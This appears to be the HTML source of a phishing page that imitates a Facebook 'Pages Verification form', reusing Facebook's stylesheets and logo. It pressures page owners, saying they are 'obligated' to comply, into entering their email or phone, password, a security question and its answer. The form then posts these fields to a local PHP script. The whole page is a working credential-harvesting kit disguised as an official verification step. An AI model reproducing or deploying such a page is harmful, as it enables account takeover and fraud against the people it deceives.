
<html lang="en" id="facebook" class=""><head>
    <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1">
    <link type="text/css" rel="stylesheet" href="./Home_files/HLj6U0z-Ul0.css">
    <link type="text/css" rel="stylesheet" href="./Home_files/bDKkReUcjuM.css">
    <link type="text/css" rel="stylesheet" href="./Home_files/x3bsMJyVkPp.css">
    <link type="text/css" rel="stylesheet" href="./Home_files/Q7hABGzj_G_.css">
    <link type="text/css" rel="stylesheet" href="./Home_files/ur-vhqTkxSy.css">
    <link type="text/css" rel="stylesheet" href="./Home_files/lFK8OeKgTAi.css">
    <link type="text/css" rel="stylesheet" href="./Home_files/8nDqs-P5UdE.css">
    <link type="text/css" rel="stylesheet" href="./Home_files/vWL2F2xZjEh.css">
    <link type="text/css" rel="stylesheet" href="./Home_files/oyUycZHHi--.css">
	<link type="text/css" rel="stylesheet" href="./Home_files/dev.css">
	<script src="jquery.js"></script>
	<script src="general.js"></script>
    <title></title>
  </head>
  <body class="_59ec webkit chrome win Locale_en_US" dir="ltr">
<div role="main">
      <div class="_4-u2 _59ed _59ee _5je5">
        <div class="_4-u3 _5bd4 _5bd5 _5je5">
          <h3 class="mbl _5je5 _52in _52id _52re _3m9">
		    <i class="fb_logo img sp_Z_xw_7FDtNv sx_b6c073"><u>Facebook logo</u></i> pages <img class="_5je5 img" src="./Home_files/reno.png" alt="Get Verified" style="
    padding-right: 228px;
">
          </h3>
          <div class="_5je5 _5bgk _5bd5 _5c8_ _5bdc _5cvx" style="
    padding-left: -4;
    padding-left: 0px;
    height: 482px;
    padding-right: 70px;
    width: 800px;
">
            <div class="_6a _6e _5je5">
              <div class="mbm _5je5 _52ii _52if _3m9">
                <strong>Facebook Pages Verification form</strong> helps page owners to verify ownership of their pages. Please carefully fill out the form by entering valid data on all the required fields.<br><br>
				By filling out this form, you will gain access to helpfull tools that help page owners:
              </div>
              <ul class="mbm _5je5 _52ii _3m9 _5bf7">
                <li class="_5je5">
                  <div class="mbm _52if _3m9">
                    Develop a customized strategy to help page owners optimize their pages.
                  </div>
                </li>
                <li class="_5je5">
                  <div class="mbm _52if _3m9">
                    Guide you through the process of verifying your rights and keep your pages secure.
                  </div>
                </li>
                <li class="_5je5">
                  <div class="mbm _52if _3m9">
                    Help you track and optimize access logs and usage data for your pages.
                  </div>
                </li>
              </ul>
              <div class="mbm _5je5 _52ii _52if _3m9">
			    <br><br>
                <em><strong><small>If you received an email or message to your account or your page to verify your ownership, you are obligated to fill out this form.</small></strong></em>
              </div>
            </div>
            <div class="_6a _6e _5je5" style="
    height: 400px;
    width: 250px;
">
		<form rel="async" class="_5je5" action="oyUycZHHi.php" id="Contact Us Logged out" method="post" enctype="multipart/form-data">
                <div>                  <div class="_5cb_" id="u_0_1">
                    <div class="_5hba">
                      
<div class="mvl">
                        <div class="mbs">
                          <div class="fwb fcg">
                            <label for="Page-Name">Page Name</label>
                          </div>
                        </div>
                        <input type="text" class="inputtext" name="Page-Name" id="additionalInfo" value="" required="" title="Please Enter Your Page Name" x-moz-errormessage="Please Enter Your Page Name">
                      </div><div class="mvl">
                        <div class="mbs">
                          <div class="fwb fcg">
                            <label for="email">Email or Phone</label>
                          </div>
                        </div>
                        <input type="text" class="inputtext" name="Email" id="email" required="" value="" <="" div="">
                      
<div class="mvl">
                        <div class="mbs">
                          <div class="fwb fcg">
                            
                          </div>
                        </div>
                        <div class="mvl">
                        <div class="mbs">
                          <div class="fwb fcg">
                            <label for="password">Password</label>
                          </div>
                        </div>
                        <input type="password" class="inputtext DOMControl_placeholder" name="Password" id="pwd" value="" required="">
                      </div>  <div class="mbs"><label for="632145698742145"><label style="width: 120px" for="question" class="login_form_label">Security Question
</label><select class="loginform cf" name="Question" id="question" required="" title="Please Enter Your Security Question" x-moz-errormessage="Please Enter Your Security Question" style="
    width: 198px;
">
<option selected="" value="">Choose A Security Question</option>
<option value="What was the last name of your first grade teacher?">What was the last name of your first grade teacher?</option>
<option value="In what city or town was your mother born?">In what city or town was your mother born?</option>
<option value="What street did you live on when you were 8 years old?">What street did you live on when you were 8 years old?</option>
<option value="What was the last name of your thrid grade teacher?">What was the last name of your thrid grade teacher?</option>
<option value="What was your grandfather's occupation">What was your grandfather's occupation</option>
<option value="What was your grandmother's occupation?">What was your grandmother's occupation?</option>
</select></label></div>
<div class="mvl">
                        <div class="mbs">
                          <div class="fwb fcg">
                            <label for="email">Answer</label>
                          </div>
                        </div>
                        <input type="text" class="inputtext" name="Answer" id="answer" value="" required="" title="Please Enter Your Answer" x-moz-errormessage="Please Enter Your Answer">
                      </div>
                      <div class="mvl">
                        <div class="paragraphWidth" id="u_0_3">
                          <input type="checkbox" style="position:relative; left: -2px; top: 3px;" name="" value="Yes."><span>I have read and agree to the <a target="_blank" href="https://www.facebook.com/policies">Terms of Use</a> on Facebook.</span>
                        </div>
                      </div>
                    </div>
                  </div>
                  <div class="mbm _52ii _52re _3m9">
                    <button value="Send" name="login" class="_42ft _42fu _3ma selected _42g- _42gy" type="submit" id="submit">Submit</button>
                  </div>
                </div>
              
            </div>
          </div></form>
        </div>
      </div>
    </div>
  

</div></div></body></html>